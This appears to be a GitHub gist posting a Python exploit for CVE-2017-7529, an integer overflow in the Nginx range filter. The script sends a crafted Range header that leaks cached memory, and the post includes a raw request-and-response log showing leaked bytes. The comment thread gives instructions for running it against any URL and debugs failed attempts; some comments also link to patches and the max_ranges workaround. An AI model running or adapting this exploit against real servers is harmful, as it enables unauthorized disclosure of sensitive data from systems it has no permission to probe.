[Exploit] CVE-2017-7529 / Nginx - Remote Integer Overflow Vulnerability

[nixawk]

Description

Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.

#!/usr/bin/python
# -*- coding:utf-8 -*-

# Nginx - Remote Integer Overflow Vulnerability
# CVE-2017-7529

import requests
import logging
import sys


logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)


def send_http_request(url, headers={}, timeout=8.0):
    httpResponse   = requests.get(url, headers=headers, timeout=timeout)
    httpHeaders    = httpResponse.headers

    log.info("status: %s: Server: %s", httpResponse.status_code, httpHeaders.get('Server', ''))
    return httpResponse


def exploit(url):
    log.info("target: %s", url)
    httpResponse   = send_http_request(url)

    content_length = httpResponse.headers.get('Content-Length', 0)
    bytes_length   = int(content_length) + 623
    content_length = "bytes=-%d,-9223372036854%d" % (bytes_length, 776000 - bytes_length)

    httpResponse   = send_http_request(url, headers={ 'Range': content_length })
    if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
        log.info("[+] Vulnerable to CVE-2017-7529")
    else:
        log.info("[?] Unknown Vulnerable")


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("[*] %s <url>" % sys.argv[0])
        sys.exit(1)

    url = sys.argv[1]
    exploit(url)


"""
GET /proxy/demo.png HTTP/1.1
Accept-Encoding: identity
Range: bytes=-17208,-9223372036854758792
Host: 127.0.0.1:8000
Connection: close
User-Agent: Python-urllib/2.7

HTTP/1.1 206 Partial Content
Server: nginx/1.13.1
Date: Mon, 14 Aug 2017 05:53:54 GMT
Content-Type: multipart/byteranges; boundary=00000000000000000002
Connection: close
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
X-Proxy-Cache: HIT


--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-16584/16585

.......<.Y......................lY....r:.Y.....@.`..v.q.."40c9-5547a060fdf00".................................................................................................................................................................................................................................................................
KEY: httpGET127.0.0.1/proxy/demo.png
HTTP/1.1 200 OK
Date: Mon, 14 Aug 2017 05:51:46 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
Accept-Ranges: bytes
Content-Length: 16585
Connection: close
Content-Type: image/png

"""

References

1. https://nvd.nist.gov/vuln/detail/CVE-2017-7529
2. https://hub.docker.com/r/vulapps/cve-2017-7529/

[vadimik]

Hi, could you tell me ho to use exploit. Thenks!

[Jaganmohan029]

Copy the code and paste it in notepad of windows or whatever the OS you're using and run it using the following command
python "text file name".py "URL you want to exploit"

ex: python3 test.py http://www."URL".com

[siochs]

Hmm, just tried the following:
docker run -d -p 80:80 -v /var/run/docker.sock:/tmp/docker.sock:ro jwilder/nginx-proxy:0.6.0
docker run -d --expose 80 -e VIRTUAL_HOST=foo.bar.com tutum/hello-world
On the host, i added 127.0.0.1 foo.bar.com to /etc/hosts to get foo.bar.com resolved.
curl -L foo.bar.com
outputs "Hello World", so the nginx-proxy is working.
python CVE-2017-7529.py http://foo.bar.com/etc/fstab
outputs

INFO:__main__:target: http://foo.bar.com/etc/fstab
INFO:__main__:status: 200: Server: nginx/1.11.10
INFO:__main__:status: 200: Server: nginx/1.11.10
INFO:__main__:[?] Unknown Vulnerable

According to Dockerfile and to the proxy replies the nginx-version is 1.11.10, so the bug should apply, right?

[nixawk]

Thanks @siochs . I will try to review it.

[woei66]

is there solution for this? is it a high risk issue?

[woei66]

I found a article about this issue and looks like there is a patch for this issue.
Let's wait for the new release with this patch code.
Thank you.

https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7529.html

the following configuration can
be used as a temporary workaround:
max_ranges 1;
http://nginx.org/download/patch.2017.ranges.txt

[r3k2]

https://access.redhat.com/security/cve/cve-2017-7529 FYI.

[siochs]

Still curious why the Exploit does not work using a vulnerable nginx-proxy runnning in a docker container.

[noraj]

You may want to submit your exploit @ https://www.exploit-db.com/submit/

[murat-kaya]

@siochs Change this;
"Content-Range" in httpResponse.text
to this
"Content-Range" in httpResponse.headers

[qre0ct]

This still does not seem to work and I get the same error as @siochs . Any further suggestions ?

[jatoch]

It didnt work for me aswell

[sangeeta667143]

didnt work for me as well..
same output for me also
NFO:main:target: http://www.examlpe.com
INFO:main:status: 200: Server: nginx/1.11.10
INFO:main:status: 200: Server: nginx/1.11.10
INFO:main:[?] Unknown Vulnerable

[tiropas]

what version of python are you all using? sometimes if the version isn't correct python gives out errors.